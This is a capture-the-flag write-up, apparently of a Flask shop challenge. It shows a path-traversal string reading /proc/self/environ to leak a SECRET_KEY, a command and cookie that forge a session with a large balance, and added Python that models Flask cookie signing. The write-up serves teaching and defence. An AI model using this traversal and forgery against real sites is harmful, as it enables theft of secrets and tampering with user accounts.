- File reading and session forgery
- Found that the money to buy the flag is 1 yuan
In fact, this is probably the case. We are so close to what we want. If we can't buy the flag, we can buy honey... On to the challenge.
- Click to download our sweet images
- The starting point of the challenge is probably to capture the request made when downloading
- Found /download?image=2.jpg, so the download endpoint takes a file name as a parameter; we can try to use it to read other useful files
- Other useful information can be read through it
- Yesterday when I did the question, I did a file under Linux
- Review: the /proc directory under Linux
The /proc directory holds runtime information about running processes; it is essentially a virtual directory (a kernel-provided filesystem, not files on disk).
To view another process's information, the pid can be brute-forced; to view the current process, simply replace /proc/[pid] with /proc/self.
/proc/[pid]/cmdline: the command line that started the process; it can expose sensitive information (arguments, paths)
/proc/[pid]/cwd/: a link to the process's working directory; if you cannot work out where the application is located, you can jump to its directory directly through cwd
/proc/[pid]/environ: the environment variables of the running process
- Read it through the image parameter:
../../../../../../../proc/self/environ
- Found
SECRET_KEY:CvwtBWoKZf7xLLUHA0stdWBChIOQSYgnqNRKKMuu
- Here you can think of session forgery: a Flask session cookie is only signed with SECRET_KEY, not encrypted, so whoever holds the key can mint a valid session
- Decode the existing session first
- Then construct a new session:
python3 flask_session_cookie_manager3.py encode -s "CvwtBWoKZf7xLLUHA0stdWBChIOQSYgnqNRKKMuu" -t "{'balance':99999}"
- payload:
eyJiYWxhbmNlIjo5OTk5OX0.YFCC5w.BVnnOhpjzJZaXC39jKtATtUZsSU
- Modify session in the browser
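As an added example (not code from the challenge or from flask_session_cookie_manager3.py), the following stdlib-only Python models how Flask's default session cookie is signed and checked, which is why the leaked SECRET_KEY is all that is needed to forge the balance and why the payload is readable even without the key. It is modelled on itsdangerous' URLSafeTimedSerializer with Flask's "cookie-session" salt; the test key is constructed and whether it reproduces the page's exact signature is not assumed.

```python
# Added example (not the challenge's or the tool's code): stdlib model of Flask's
# default session cookie: itsdangerous URLSafeTimedSerializer, salt "cookie-session",
# "hmac" key derivation, SHA-1 signatures.
import base64, hashlib, hmac, json, zlib

SALT = b"cookie-session"  # salt Flask's session interface passes to itsdangerous
# Cookie from the writeup; its payload is readable by anyone, key or no key.
PAGE_COOKIE = "eyJiYWxhbmNlIjo5OTk5OX0.YFCC5w.BVnnOhpjzJZaXC39jKtATtUZsSU"

def b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def derive_key(secret: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()

def peek(cookie: str):
    """Read payload and timestamp WITHOUT any key: the cookie is signed, not encrypted."""
    payload, ts, _sig = cookie.rsplit(".", 2)
    if payload.startswith("."):  # leading "." marks a zlib-compressed payload
        raw = zlib.decompress(b64d(payload[1:]))
    else:
        raw = b64d(payload)
    return json.loads(raw), int.from_bytes(b64d(ts), "big")

def sign(secret: str, data: dict, ts: int) -> str:
    """Mint a cookie for `data`; this is all a holder of SECRET_KEY has to do."""
    body = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    stamp = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    value = f"{b64e(body)}.{b64e(stamp)}"
    sig = hmac.new(derive_key(secret), value.encode(), hashlib.sha1).digest()
    return f"{value}.{b64e(sig)}"

def verify(secret: str, cookie: str):
    """Server-side check: return the session dict, or None if the signature is bad."""
    try:
        value, sig = cookie.rsplit(".", 1)
        expected = hmac.new(derive_key(secret), value.encode(), hashlib.sha1).digest()
        if not hmac.compare_digest(expected, b64d(sig)):
            return None
        return peek(cookie)[0]
    except (ValueError, json.JSONDecodeError, zlib.error):
        return None
```

The defensive takeaway is that verify() is only as strong as the secrecy of SECRET_KEY: keep it out of the environment and files that a path-traversal read can reach, and rotate it if it ever leaks.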
You finally have enough money to buy the things you like, but are the things you like still available?
Doing the question makes me depressed!!
- I encountered some problems when running flask_session_cookie_manager3.py
- I wrote an article for CTFers who run into the same problem
- The script still cannot run after installing the module with pip